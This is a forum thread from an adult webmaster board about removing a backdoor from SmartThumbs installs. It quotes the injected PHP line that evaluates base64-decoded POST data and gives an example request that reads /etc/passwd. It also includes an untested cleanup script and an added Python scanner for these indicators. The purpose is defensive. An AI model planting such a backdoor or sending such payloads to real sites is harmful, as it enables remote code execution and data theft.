GoFuckYourself.com - Adult Webmaster Forum


MMarko 05-08-2010 06:39 AM

removing ST exploit
 
I wrote a simple tutorial on how to remove the ST exploit and check if you're affected by it... because it looks like many ST installs are still infected and have not been cleaned. I think the update will not clean it... you have to do it manually...

Remove SmartThumbs exploit in 5 steps

boneless 05-08-2010 06:50 AM

i read it and got a small question:

it says if you got the include line and the base64 line then you're still infected.

i only got this one:
@eval(base64_decode($_POST[qxp]));//';

does that mean im not infected, or still infected?

boneless 05-08-2010 06:55 AM

damn just found the other line as well, except it ain't including sesa.tmp but webcam.tmp.

should i show the post you made to my sys admin and have them take care of it? or do it myself, as i don't have access to phpmyadmin. my host normally does that type of stuff.

is there any other way besides phpmyadmin to do this?

MMarko 05-08-2010 08:06 AM

you're infected for sure

well... you need something which will allow you to edit entries in mysql tables... so phpmyadmin or anything else capable of editing table values
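
The two indicators discussed above (the eval(base64_decode($_POST[...])) line and an include of a .tmp file such as sesa.tmp or webcam.tmp) can be checked for across a whole install. The scanner below is an added example, not part of the original thread or of SmartThumbs; it generalizes to any request superglobal and any included .tmp path, and the function names and the sample file contents are constructed for illustration.

```python
import os
import re

# eval() fed straight from base64-decoded request data, as in the line quoted in the thread.
EVAL_RE = re.compile(
    r"@?\s*eval\s*\(\s*base64_decode\s*\(\s*"
    r"\$_(?:POST|GET|REQUEST|COOKIE)\s*\[[^\]]*\]\s*\)\s*\)", re.IGNORECASE)
# include/require of a *.tmp file (the thread reports sesa.tmp and webcam.tmp).
INCLUDE_RE = re.compile(
    r"\b(?:include|require)(?:_once)?\s*\(?\s*['\"]([^'\"]+\.tmp)['\"]", re.IGNORECASE)

# Constructed sample, not a real variables.php.
SAMPLE = """<?php
$niche = 'general';@eval(base64_decode($_POST[qxp]));//';
include('/tmp/webcam.tmp');
$title = 'thumbs';
"""

def scan_php(source):
    """Return (line_number, indicator, matched_text) for each hit in PHP source text."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for m in EVAL_RE.finditer(line):
            findings.append((lineno, "eval-of-request-data", m.group(0).strip()))
        for m in INCLUDE_RE.finditer(line):
            findings.append((lineno, "include-tmp-file", m.group(1)))
    return findings

def scan_tree(root, suffixes=(".php", ".inc")):
    """Scan every PHP-like file under root; return {path: findings} for files with hits."""
    results = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(suffixes):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = scan_php(fh.read())
                if hits:
                    results[path] = hits
    return results

if __name__ == "__main__":
    for lineno, kind, text in scan_php(SAMPLE):
        print(f"line {lineno}: {kind}: {text}")
```

A clean result covers files on disk only; the value stored in the MySQL settings table, which the thread says also has to be edited, needs its own check.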

k0nr4d 05-08-2010 08:20 AM

untested (might not work at all. I don't have ST, and I just wrote it based on the instructions in the blog post). I take no responsibility if it breaks something, use at your own risk.

PHP Code:

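<?php
// Database credentials: fill these in before running.
$dbserver = '';
$dbuser = '';
$dbpass = '';
$dbname = '';
// Note: the mysql_* functions used here were removed in PHP 7.
$dblink = mysql_connect($dbserver, $dbuser, $dbpass);
mysql_select_db($dbname, $dblink);

// Back up variables.php before modifying it.
copy("st/admin/variables.php", "tmp/variables.bak");
$string = file_get_contents("st/admin/variables.php");
// Single-quoted search string so PHP does not interpolate $_POST[qxp] into it.
$string = str_replace('@eval(base64_decode($_POST[qxp]));//\';', "", $string);
file_put_contents("st/admin/variables.php", $string);
// Delete the dropped files that the injected include line points at.
unlink("/tmp/sesa.tmp");
unlink("/tmp/webcam.tmp");
// Load the cleaned file so $niche is defined, then write it back to the settings table.
include('st/admin/variables.php');
mysql_query("UPDATE st_settings SET niche = '" . mysql_real_escape_string($niche) . "'");
exit("Done");
?>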


grumpy 05-08-2010 08:24 AM

Quote:

Originally Posted by k0nr4d (Post 17121525)
untested (might not work at all. I don't have ST, and I just wrote it based on the instructions in the blog post). I take no responsibility if it breaks something, use at your own risk.


$niche is undefined

k0nr4d 05-08-2010 08:26 AM

Quote:

Originally Posted by grumpy (Post 17121534)
$niche is undefined

Sure it is, it's including the variables.php file before inserting it

PXN 05-08-2010 09:25 AM

nice stuff. Thanks for sharing.

MMarko 05-08-2010 04:50 PM

Code:

$dbserver = '';
$dbuser = '';
$dbpass = '';
$dbname = '';

you should include st/classes/mysql.php before that... and remove those lines completely...

however I'd suggest that you manually take a look at those files so you double check everything and avoid any major fuckup...

rowan 05-08-2010 06:32 PM

Quote:

Originally Posted by boneless (Post 17121341)
i read it and got a small question:

it says if you got the include line and the base64 line then you're still infected.

i only got this one:
@eval(base64_decode($_POST[qxp]));//';

does that mean im not infected, or still infected?

FYI that little bit of code executes whatever is passed in variable 'qxp'

So they could post something like qxp=cat%20/etc/passwd (display the contents of the password file)

Davy 05-09-2010 02:05 AM

Quote:

Originally Posted by boneless (Post 17121341)
@eval(base64_decode($_POST[qxp]));

Holy shit. Who in the right state of mind would add such a code to their product? Yikes! :2 cents:

CyberHustler 05-09-2010 02:14 AM

:Oh crap

LoveSandra 05-09-2010 06:19 AM

wtf.......................

nation-x 05-09-2010 07:29 AM

Quote:

Originally Posted by Davy (Post 17123146)
Holy shit. Who in the right state of mind would add such a code to their product? Yikes! :2 cents:

uuuuuhhhhh wut??

Davy 05-09-2010 08:09 AM

Quote:

Originally Posted by nation-x (Post 17123485)
uuuuuhhhhh wut??

This thread is about a security exploit. I thought the info above was the security hole. :1orglaugh

u-Bob 05-09-2010 08:18 AM

if your box was compromised, there's only 1 thing to do: reinstall everything.

MMarko 05-13-2010 03:12 AM

lol, yes and for every wordpress exploit everyone should reinstall the whole box :D

don't be silly

u-Bob 05-13-2010 04:44 AM

Quote:

Originally Posted by MMarko (Post 17134587)
lol, yes and for every wordpress exploit everyone should reinstall the whole box :D

simple answer: yes.

Shoplifter 05-13-2010 12:40 PM

Bumping this to the top. I think this exploit is not getting the attention it deserves.

We cleaned a number of sites and in some cases the exploit was back in 3 hours.

Tulku 05-13-2010 01:39 PM

Bumping ..


All times are GMT -7.